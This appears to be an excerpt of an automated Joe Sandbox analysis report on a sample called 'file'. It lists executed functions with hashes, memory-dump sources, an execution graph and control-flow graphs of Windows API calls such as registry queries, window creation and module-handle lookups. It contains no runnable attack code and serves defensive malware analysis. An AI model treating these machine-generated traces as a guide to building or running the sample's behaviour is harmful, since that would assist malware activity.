                                            • Instruction Fuzzy Hash: 8DD1E43182065A9ACB10EF74D890AA9B7B1FF95300F50DB9AE50977220EF746EC4CF91
                                            Function 07679DF1 Relevance: .1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac6e5539e570516bc74fb8db55cb28874a17d3a2293a8fd6ffa91634538cea52
                                            • Instruction ID: 1202bd748b28a6569e62f00a47c8faa8e2217336b86d9fe7371c7c2cdd0f82d3
                                            • Opcode Fuzzy Hash: ac6e5539e570516bc74fb8db55cb28874a17d3a2293a8fd6ffa91634538cea52
                                            • Instruction Fuzzy Hash: C751F9B5E102198BDB14CFA9C5806AEFBF2FF89304F24816AD419AB355D735AD42CF60

                                            Execution Graph

                                            Execution Coverage:10.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:2.4%
                                            Total number of Nodes:170
                                            Total number of Limit Nodes:13
                                            execution_graph 45761 14a19a8 45762 14a19d7 45761->45762 45765 14a1730 45762->45765 45764 14a1afc 45766 14a173b 45765->45766 45767 14a201a 45766->45767 45770 14a4b98 45766->45770 45784 14a4b83 45766->45784 45767->45764 45771 14a4bc3 45770->45771 45772 14a36ac 3 API calls 45771->45772 45773 14a4c2a 45772->45773 45780 14a36ac 3 API calls 45773->45780 45798 14a5150 45773->45798 45803 14a50d0 45773->45803 45809 14a5180 45773->45809 45774 14a4c46 45775 14a36bc GetModuleHandleW 45774->45775 45777 14a4c72 45774->45777 45776 14a4cb6 45775->45776 45814 14a66a8 45776->45814 45817 14a6698 45776->45817 45780->45774 45785 14a4bc3 45784->45785 45786 14a36ac 3 API calls 45785->45786 45787 14a4c2a 45786->45787 45794 14a36ac 3 API calls 45787->45794 45795 14a5150 3 API calls 45787->45795 45796 14a5180 3 API calls 45787->45796 45797 14a50d0 3 API calls 45787->45797 45788 14a4c46 45789 14a36bc GetModuleHandleW 45788->45789 45791 14a4c72 45788->45791 45790 14a4cb6 45789->45790 45792 14a6698 2 API calls 45790->45792 45793 14a66a8 CreateWindowExW 45790->45793 45792->45791 45793->45791 45794->45788 45795->45788 45796->45788 45797->45788 45799 14a51ad 45798->45799 45800 14a522e 45799->45800 45801 14a52e0 2 API calls 45799->45801 45802 14a52f0 2 API calls 45799->45802 45801->45800 45802->45800 45804 14a50eb 45803->45804 45805 14a50ef 45803->45805 45804->45774 45806 14a522e 45805->45806 45807 14a52e0 2 API calls 45805->45807 45808 14a52f0 2 API calls 45805->45808 45806->45806 45807->45806 45808->45806 45810 14a51ad 45809->45810 45811 14a522e 45810->45811 45812 14a52e0 2 API calls 45810->45812 45813 14a52f0 2 API calls 45810->45813 45812->45811 45813->45811 45815 14a66dd 45814->45815 45824 14a4764 45814->45824 45815->45777 45818 14a66ae 45817->45818 45819 14a66e6 CreateWindowExW 45817->45819 45820 14a4764 CreateWindowExW 45818->45820 45823 14a681c 45819->45823 45821 14a66dd 45820->45821 45821->45777 45823->45823 45825 14a66f8 CreateWindowExW 45824->45825 45827 14a681c 45825->45827 45827->45827 45648 16bd1f8 45649 16bd217 45648->45649 45650 16bd24b LdrInitializeThunk 45649->45650 45651 16bd268 45650->45651 45828 16bbd08 45829 16bbd27 LdrInitializeThunk 45828->45829 45831 16bbd5b 45829->45831 45841 14aa3b0 45842 14aa3f6 45841->45842 45845 14aa580 45842->45845 45843 14aa4e3 45846 14aa58b 45845->45846 45846->45843 45847 14aa64f DuplicateHandle 45846->45847 45848 14aa68e 45847->45848 45848->45843 45832 16b6740 45836 16b675f 45832->45836 45833 16b69c8 45835 16b6170 RegQueryValueExW 45835->45836 45836->45833 45836->45835 45837 16b6164 45836->45837 45838 16b6a50 RegOpenKeyExW 45837->45838 45840 16b6b16 45838->45840 45652 141d01c 45654 141d034 45652->45654 45653 141d08e 45654->45653 45662 14a478c 45654->45662 45670 14a68b0 45654->45670 45676 14a68a0 45654->45676 45682 14a69d0 45654->45682 45687 14ab1e0 45654->45687 45696 14a4770 45654->45696 45704 14a477c 45654->45704 45665 14a4797 45662->45665 45663 14ab269 45667 14ab267 45663->45667 45716 14aa164 45663->45716 45665->45663 45666 14ab259 45665->45666 45708 14ab380 45666->45708 45712 14ab390 45666->45712 45671 14a68d6 45670->45671 45672 14a477c 3 API calls 45671->45672 45673 14a68e2 45672->45673 45674 14a478c CallWindowProcW 45673->45674 45675 14a68f7 45674->45675 45675->45653 45677 14a68d6 45676->45677 45678 14a477c 3 API calls 45677->45678 45679 14a68e2 45678->45679 45680 14a478c CallWindowProcW 45679->45680 45681 14a68f7 45680->45681 45681->45653 45683 14a69de 45682->45683 45686 14a6992 45682->45686 45684 14a69e7 45683->45684 45720 14a47b4 45683->45720 45684->45653 45686->45653 45688 14ab202 45687->45688 45690 14ab186 45687->45690 45689 14ab269 45688->45689 45692 14ab259 45688->45692 45691 14aa164 CallWindowProcW 45689->45691 45693 14ab267 45689->45693 45690->45653 45691->45693 45694 14ab380 CallWindowProcW 45692->45694 45695 14ab390 CallWindowProcW 45692->45695 45694->45693 45695->45693 45698 14a4771 45696->45698 45697 14ab269 45699 14aa164 CallWindowProcW 45697->45699 45701 14ab267 45697->45701 45698->45697 45700 14ab259 45698->45700 45699->45701 45702 14ab380 CallWindowProcW 45700->45702 45703 14ab390 CallWindowProcW 45700->45703 45702->45701 45703->45701 45705 14a4787 45704->45705 45706 14a47b4 3 API calls 45705->45706 45707 14a69e7 45706->45707 45707->45653 45710 14ab39e 45708->45710 45709 14aa164 CallWindowProcW 45709->45710 45710->45709 45711 14ab487 45710->45711 45711->45667 45714 14ab39e 45712->45714 45713 14aa164 CallWindowProcW 45713->45714 45714->45713 45715 14ab487 45714->45715 45715->45667 45717 14aa16f 45716->45717 45718 14ab552 CallWindowProcW 45717->45718 45719 14ab501 45717->45719 45718->45719 45719->45667 45721 14a47bf 45720->45721 45726 14a36ac 45721->45726 45723 14a6a49 45725 14a6ab7 45723->45725 45731 14a36bc 45723->45731 45727 14a36b7 45726->45727 45728 14a50eb 45727->45728 45735 14a52e0 45727->45735 45748 14a52f0 45727->45748 45728->45723 45732 14a5650 GetModuleHandleW 45731->45732 45734 14a56c5 45732->45734 45734->45725 45736 14a5305 45735->45736 45737 14a36bc GetModuleHandleW 45736->45737 45738 14a534a 45736->45738 45737->45738 45739 14a36bc GetModuleHandleW 45738->45739 45741 14a5516 45738->45741 45742 14a549b 45739->45742 45740 14a5571 45740->45728 45741->45740 45743 14a5698 GetModuleHandleW 45741->45743 45742->45740 45742->45741 45745 14a36bc GetModuleHandleW 45742->45745 45744 14a56c5 45743->45744 45744->45728 45746 14a54e9 45745->45746 45746->45741 45747 14a36bc GetModuleHandleW 45746->45747 45747->45741 45749 14a5305 45748->45749 45750 14a36bc GetModuleHandleW 45749->45750 45751 14a534a 45749->45751 45750->45751 45752 14a36bc GetModuleHandleW 45751->45752 45754 14a5516 45751->45754 45757 14a549b 45752->45757 45753 14a5571 45753->45728 45754->45753 45755 14a5698 GetModuleHandleW 45754->45755 45756 14a56c5 45755->45756 45756->45728 45757->45753 45757->45754 45758 14a36bc GetModuleHandleW 45757->45758 45759 14a54e9 45758->45759 45759->45754 45760 14a36bc GetModuleHandleW 45759->45760 45760->45754

                                            Executed Functions

                                            Function 0166B790 Relevance: 3.1, Instructions: 3141COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 78f0c83d68157fb55dfc8b1276ac56940d2226672626bcb1bbb44db314ca06a4
                                            • Instruction ID: c1f320af37b4b2b2048de5cc2ada2e434cdfe9130b799a6acb6d551a8882d308
                                            • Opcode Fuzzy Hash: 78f0c83d68157fb55dfc8b1276ac56940d2226672626bcb1bbb44db314ca06a4
                                            • Instruction Fuzzy Hash: D9632D34D10B198ECB11EF68C8446ADF7B5FF99300F55D69AE458A7221EB31AAC4CF81
                                            Function 0166B78F Relevance: 2.7, Instructions: 2725COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6bfcb549599c0aed08551bc7df526958413fb832d699c0aff38ff99c0ea7fa1
                                            • Instruction ID: acd6cb1a77f1de8286142b079a5a760b38e8d81ca4d21cfc5d1aadb988a4aa5c
                                            • Opcode Fuzzy Hash: e6bfcb549599c0aed08551bc7df526958413fb832d699c0aff38ff99c0ea7fa1
                                            • Instruction Fuzzy Hash: CB53FA34D10B198ECB11EF68C884699F7B5FF99300F55D69AE458B7221EB31AAC4CF81
                                            Function 016BD1F8 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2336 16bd1f8-16bd262 call 16bba28 LdrInitializeThunk 2345 16bd3ab-16bd3c8 2336->2345 2346 16bd268-16bd282 2336->2346 2358 16bd3cd-16bd3d6 2345->2358 2346->2345 2349 16bd288-16bd2a2 2346->2349 2352 16bd2a8 2349->2352 2353 16bd2a4-16bd2a6 2349->2353 2355 16bd2ab-16bd306 call 16bc46c 2352->2355 2353->2355 2365 16bd308-16bd30a 2355->2365 2366 16bd30c 2355->2366 2367 16bd30f-16bd3a9 call 16bc46c 2365->2367 2366->2367 2367->2358
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a6e194a558fe27a3185410252b9b49e4b823a5f0f459796ffc0ad1766065172c
                                            • Instruction ID: f6fc49a8cf17207b32476633f1cdc0612f87149827dc31852019d08ad68d789a
                                            • Opcode Fuzzy Hash: a6e194a558fe27a3185410252b9b49e4b823a5f0f459796ffc0ad1766065172c
                                            • Instruction Fuzzy Hash: 5A51B170B103099FCB04EFB5D884AAEBBF6FF95610F148569E0029B295EF70D845CBA1
                                            Function 016601D0 Relevance: .9, Instructions: 877COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 297cf045212d38968b83be7b82fb43dbfe09688e2e74ce947645f846eb5eb623
                                            • Instruction ID: f62f9bcb27c9d4a1d6397039fe2ac9849f6cdea93d1d86391204a48efd904767
                                            • Opcode Fuzzy Hash: 297cf045212d38968b83be7b82fb43dbfe09688e2e74ce947645f846eb5eb623
                                            • Instruction Fuzzy Hash: 3A823C30A00219DFDB15CF68C984AAEBBFABF88314F158569F505AB3A6D730ED41CB51
                                            Function 0166A538 Relevance: .8, Instructions: 760COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6940a7906d3c50bad9c038e4ec82dd718b7b3aad8ade1a4c61a01501e379e83
                                            • Instruction ID: 3267be5495fa288c3e62b1f62b4dace1b694ae73d722e31babce64afc56937e2
                                            • Opcode Fuzzy Hash: e6940a7906d3c50bad9c038e4ec82dd718b7b3aad8ade1a4c61a01501e379e83
                                            • Instruction Fuzzy Hash: E862F730E007198FDB25EF79C95469DBBF5BF89700F1086A9D50AAB254EF309A85CF90
                                            Function 014A52F0 Relevance: 1.8, APIs: 1, Instructions: 303COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1779 14a52f0-14a5316 1782 14a5318-14a532f 1779->1782 1783 14a5367-14a536f 1779->1783 1788 14a5339 1782->1788 1789 14a5331-14a5337 1782->1789 1784 14a5371-14a5376 call 14a46c0 1783->1784 1785 14a53b5-14a53fe call 14a46cc 1783->1785 1791 14a537b-14a53b0 1784->1791 1809 14a55ab-14a55dd 1785->1809 1810 14a5404-14a544f 1785->1810 1792 14a533f-14a5345 call 14a36bc 1788->1792 1789->1792 1800 14a5452-14a5454 1791->1800 1796 14a534a-14a5361 call 14a46b4 1792->1796 1796->1783 1803 14a557d-14a55a4 1796->1803 1868 14a5457 call 14a58f8 1800->1868 1869 14a5457 call 14a58e9 1800->1869 1803->1809 1805 14a545d-14a54ab call 14a36bc call 14a46d8 1832 14a54b0-14a54b4 1805->1832 1826 14a55e4-14a5690 1809->1826 1810->1800 1840 14a5698-14a56c3 GetModuleHandleW 1826->1840 1841 14a5692-14a5695 1826->1841 1833 14a54ba-14a54c7 1832->1833 1834 14a5571-14a557c 1832->1834 1838 14a556d-14a556f 1833->1838 1839 14a54cd-14a54fa call 14a36bc call 14a46cc 1833->1839 1838->1826 1838->1834 1839->1838 1851 14a54fc-14a550a 1839->1851 1842 14a56cc-14a56e0 1840->1842 1843 14a56c5-14a56cb 1840->1843 1841->1840 1843->1842 1851->1838 1852 14a550c-14a5523 call 14a36bc call 14a46e4 1851->1852 1857 14a5530-14a555f call 14a46d8 1852->1857 1858 14a5525-14a552e call 14a46d8 1852->1858 1857->1838 1866 14a5561-14a556b 1857->1866 1858->1838 1866->1838 1866->1857 1868->1805 1869->1805
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 014A56B6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 410f1fcfe88b955960b8aef2f35ec2d7eea99b85294fdaf693f0c4bdb9d74824
                                            • Instruction ID: 0d95312d4824a4aa2c276a5e0e1f9b5209b932301944bbbb7cc33775fd4f1afd
                                            • Opcode Fuzzy Hash: 410f1fcfe88b955960b8aef2f35ec2d7eea99b85294fdaf693f0c4bdb9d74824
                                            • Instruction Fuzzy Hash: E8C19D70A007068FDB15EF6AD48466EBBF2FFA8210B45852ED40ADB765DB74E801CF90
                                            Function 016BBB19 Relevance: 1.7, APIs: 1, Instructions: 215libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2107 16bbb19-16bbb37 2108 16bbb39-16bbb43 2107->2108 2109 16bbb5c-16bbb87 2107->2109 2110 16bbb58-16bbb5b 2108->2110 2111 16bbb45-16bbb56 2108->2111 2114 16bbb89-16bbb93 2109->2114 2115 16bbbac-16bbbd7 2109->2115 2111->2110 2116 16bbba8-16bbbab 2114->2116 2117 16bbb95-16bbba6 2114->2117 2120 16bbbd9-16bbbe3 2115->2120 2121 16bbbfc-16bbc27 2115->2121 2117->2116 2122 16bbbf8-16bbbfb 2120->2122 2123 16bbbe5-16bbbec 2120->2123 2126 16bbc29-16bbc33 2121->2126 2127 16bbc4c-16bbc58 2121->2127 2125 16bbbf6 2123->2125 2125->2122 2128 16bbc48-16bbc4b 2126->2128 2129 16bbc35-16bbc46 2126->2129 2127->2125 2132 16bbc5a-16bbc77 2127->2132 2129->2128 2133 16bbc79-16bbc83 2132->2133 2134 16bbc9c-16bbcc7 2132->2134 2135 16bbc98-16bbc9b 2133->2135 2136 16bbc85-16bbc96 2133->2136 2139 16bbcc9-16bbcd3 2134->2139 2140 16bbcec-16bbd2e 2134->2140 2136->2135 2141 16bbce8-16bbceb 2139->2141 2142 16bbcd5-16bbce6 2139->2142 2147 16bbd36-16bbd54 LdrInitializeThunk 2140->2147 2142->2141 2149 16bbd5b-16bbd67 2147->2149 2150 16bbf68-16bbf7b 2149->2150 2151 16bbd6d-16bbd76 2149->2151 2154 16bbfa2-16bbfa6 2150->2154 2152 16bbf9d 2151->2152 2153 16bbd7c-16bbd91 2151->2153 2152->2154 2158 16bbdab-16bbdc6 2153->2158 2159 16bbd93-16bbda6 2153->2159 2155 16bbfa8 2154->2155 2156 16bbfb1 2154->2156 2155->2156 2160 16bbfb2 2156->2160 2168 16bbdc8-16bbdd2 2158->2168 2169 16bbdd4 2158->2169 2161 16bbf3c-16bbf40 2159->2161 2160->2160 2163 16bbf4b-16bbf4c 2161->2163 2164 16bbf42 2161->2164 2163->2150 2164->2163 2170 16bbdd9-16bbddb 2168->2170 2169->2170 2171 16bbddd-16bbdf0 2170->2171 2172 16bbdf5-16bbe8d call 16ba370 call 16b0040 * 2 2170->2172 2171->2161 2193 16bbe9b 2172->2193 2194 16bbe8f-16bbe99 2172->2194 2195 16bbea0-16bbea2 2193->2195 2194->2195 2196 16bbee6-16bbf3a 2195->2196 2197 16bbea4-16bbea6 2195->2197 2196->2161 2198 16bbea8-16bbeb2 2197->2198 2199 16bbeb4 2197->2199 2201 16bbeb9-16bbebb 2198->2201 2199->2201 2201->2196 2202 16bbebd-16bbee4 2201->2202 2202->2196
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2832b7aeddc3caf14baa2a501fa7aef5d7760230cd01db1afdef088775055819
                                            • Instruction ID: f4cf40a60f0c0fb69ce3a101a238845191b7bcfbb2577eea6d45185bfbeafb8f
                                            • Opcode Fuzzy Hash: 2832b7aeddc3caf14baa2a501fa7aef5d7760230cd01db1afdef088775055819
                                            • Instruction Fuzzy Hash: 1181D2306053459FD316DB78D898BAA7BF6AF92300F2580A6D504DF3A2DB39DC46CB11
                                            Function 016BBD08 Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2212 16bbd08-16bbd54 LdrInitializeThunk 2216 16bbd5b-16bbd67 2212->2216 2217 16bbf68-16bbf7b 2216->2217 2218 16bbd6d-16bbd76 2216->2218 2221 16bbfa2-16bbfa6 2217->2221 2219 16bbf9d 2218->2219 2220 16bbd7c-16bbd91 2218->2220 2219->2221 2225 16bbdab-16bbdc6 2220->2225 2226 16bbd93-16bbda6 2220->2226 2222 16bbfa8 2221->2222 2223 16bbfb1 2221->2223 2222->2223 2227 16bbfb2 2223->2227 2235 16bbdc8-16bbdd2 2225->2235 2236 16bbdd4 2225->2236 2228 16bbf3c-16bbf40 2226->2228 2227->2227 2230 16bbf4b-16bbf4c 2228->2230 2231 16bbf42 2228->2231 2230->2217 2231->2230 2237 16bbdd9-16bbddb 2235->2237 2236->2237 2238 16bbddd-16bbdf0 2237->2238 2239 16bbdf5-16bbe8d call 16ba370 call 16b0040 * 2 2237->2239 2238->2228 2260 16bbe9b 2239->2260 2261 16bbe8f-16bbe99 2239->2261 2262 16bbea0-16bbea2 2260->2262 2261->2262 2263 16bbee6-16bbf3a 2262->2263 2264 16bbea4-16bbea6 2262->2264 2263->2228 2265 16bbea8-16bbeb2 2264->2265 2266 16bbeb4 2264->2266 2268 16bbeb9-16bbebb 2265->2268 2266->2268 2268->2263 2269 16bbebd-16bbee4 2268->2269 2269->2263
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6d25765d37d6c850149221947541c4f2aa18d0f461c54dfa300b02bfc8998f6d
                                            • Instruction ID: d3505561d8008f55722432d189ccea5141b894dd7b801914203c87df3dc1c1a7
                                            • Opcode Fuzzy Hash: 6d25765d37d6c850149221947541c4f2aa18d0f461c54dfa300b02bfc8998f6d
                                            • Instruction Fuzzy Hash: 4A614D31A10209DBDB24EFB9D8987AEBBF6AF54300F548429E402A7394DB759885CF90
                                            Function 016BD198 Relevance: 1.7, APIs: 1, Instructions: 168libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2279 16bd198-16bd1b7 2280 16bd1b9-16bd1c3 2279->2280 2281 16bd1dc-16bd1e8 2279->2281 2282 16bd1d8-16bd1db 2280->2282 2283 16bd1c5-16bd1d6 2280->2283 2286 16bd1ea-16bd22f call 16bba28 2281->2286 2287 16bd195-16bd197 2281->2287 2283->2282 2293 16bd237-16bd23d 2286->2293 2287->2279 2294 16bd244 2293->2294 2295 16bd24b-16bd262 LdrInitializeThunk 2294->2295 2296 16bd3ab-16bd3c8 2295->2296 2297 16bd268-16bd282 2295->2297 2309 16bd3cd-16bd3d6 2296->2309 2297->2296 2300 16bd288-16bd2a2 2297->2300 2303 16bd2a8 2300->2303 2304 16bd2a4-16bd2a6 2300->2304 2306 16bd2ab-16bd306 call 16bc46c 2303->2306 2304->2306 2316 16bd308-16bd30a 2306->2316 2317 16bd30c 2306->2317 2318 16bd30f-16bd3a9 call 16bc46c 2316->2318 2317->2318 2318->2309
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e844e0cadfab470eaaf118d780388149e52f153d24b93798b723d1fe3ab587d6
                                            • Instruction ID: 9837ac56703a86af21dc716d099c51dc295c48a91e9c3f510d2cad5b5a7b0d0d
                                            • Opcode Fuzzy Hash: e844e0cadfab470eaaf118d780388149e52f153d24b93798b723d1fe3ab587d6
                                            • Instruction Fuzzy Hash: 1A51D270B003059FDB05EBB8D884AAEBBF6FF85710F14856AD102DB2A5DB74DD458B60
                                            Function 014A6698 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2385 14a6698-14a66ac 2386 14a66ae-14a66d8 call 14a4764 2385->2386 2387 14a66e6-14a675e 2385->2387 2391 14a66dd-14a66de 2386->2391 2388 14a6769-14a6770 2387->2388 2389 14a6760-14a6766 2387->2389 2392 14a677b-14a681a CreateWindowExW 2388->2392 2393 14a6772-14a6778 2388->2393 2389->2388 2395 14a681c-14a6822 2392->2395 2396 14a6823-14a685b 2392->2396 2393->2392 2395->2396 2400 14a6868 2396->2400 2401 14a685d-14a6860 2396->2401 2402 14a6869 2400->2402 2401->2400 2402->2402
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014A680A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 0b894028ce2b596e1135531939d16ae78a74ef0e2e822fc31d1071d25000bd25
                                            • Instruction ID: b530a92a7e12a49a8d9fd4267ecc3a8d40a80d54dcb87d0891120231f498de5c
                                            • Opcode Fuzzy Hash: 0b894028ce2b596e1135531939d16ae78a74ef0e2e822fc31d1071d25000bd25
                                            • Instruction Fuzzy Hash: 415112B5C00249AFDF01CF99C980ADEBFB6FF48300F2A816AE408AB221D7759851CF50
                                            Function 016B69F2 Relevance: 1.6, APIs: 1, Instructions: 125registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2403 16b69f2-16b6a0f 2405 16b6a11-16b6a1b 2403->2405 2406 16b6a34-16b6a45 2403->2406 2407 16b6a1d-16b6a2e 2405->2407 2408 16b6a30-16b6a33 2405->2408 2411 16b6ab0-16b6ab1 2406->2411 2412 16b6a47-16b6a49 2406->2412 2407->2408 2413 16b6ab2 2411->2413 2414 16b6a4b-16b6aa0 2412->2414 2415 16b6ab4-16b6b14 RegOpenKeyExW 2412->2415 2413->2415 2419 16b6aa8 2414->2419 2420 16b6aa2-16b6aa5 2414->2420 2416 16b6b1d-16b6b55 2415->2416 2417 16b6b16-16b6b1c 2415->2417 2424 16b6b68 2416->2424 2425 16b6b57-16b6b60 2416->2425 2417->2416 2419->2413 2420->2419 2426 16b6b69 2424->2426 2425->2424 2426->2426
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 016B6B04
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 8cb3f05a00a49df86c6c1fec4815233e398da81e48c6cd29596134c6d4e2b9e1
                                            • Instruction ID: ea0820f8550be7bbaa11840db23742c21c61fba3c0b6e403a4df6d3d8ae409c6
                                            • Opcode Fuzzy Hash: 8cb3f05a00a49df86c6c1fec4815233e398da81e48c6cd29596134c6d4e2b9e1
                                            • Instruction Fuzzy Hash: 8F416670A013498FDB11CFA9C884B9AFFF5AF49304F28C1AAD909AB351D7759885CF60
                                            Function 016B6CA8 Relevance: 1.6, APIs: 1, Instructions: 118registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2427 16b6ca8-16b6cc7 2428 16b6cc9-16b6cd3 2427->2428 2429 16b6cec-16b6d71 2427->2429 2430 16b6ce8-16b6ceb 2428->2430 2431 16b6cd5-16b6ce6 2428->2431 2437 16b6d79-16b6d83 2429->2437 2438 16b6d73-16b6d76 2429->2438 2431->2430 2439 16b6d8f-16b6dd1 RegQueryValueExW 2437->2439 2440 16b6d85-16b6d8d 2437->2440 2438->2437 2441 16b6dda-16b6e14 2439->2441 2442 16b6dd3-16b6dd9 2439->2442 2440->2439 2446 16b6e1e 2441->2446 2447 16b6e16 2441->2447 2442->2441 2448 16b6e1f 2446->2448 2447->2446 2448->2448
                                            APIs
                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 016B6DC1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816871031.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_16b0000_file.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: c18aea48b1b156dd2e7c02f52824b763273407eae467f3f83cc69ff82b0e241d
                                            • Instruction ID: 5a760b2bd6742217672743d71f793ee14db4c9de059d3da0b94630cda1fee90b
                                            • Opcode Fuzzy Hash: c18aea48b1b156dd2e7c02f52824b763273407eae467f3f83cc69ff82b0e241d
                                            • Instruction Fuzzy Hash: 1E410371E043589FDB11CFA9C885ADEBFF5AF48310F15806AE818AB351D7749885CF90
                                            Function 014A4764 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2449 14a4764-14a675e 2451 14a6769-14a6770 2449->2451 2452 14a6760-14a6766 2449->2452 2453 14a677b-14a681a CreateWindowExW 2451->2453 2454 14a6772-14a6778 2451->2454 2452->2451 2456 14a681c-14a6822 2453->2456 2457 14a6823-14a685b 2453->2457 2454->2453 2456->2457 2461 14a6868 2457->2461 2462 14a685d-14a6860 2457->2462 2463 14a6869 2461->2463 2462->2461 2463->2463
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014A680A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3813423204.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_14a0000_file.jbxd
                                            Similarity
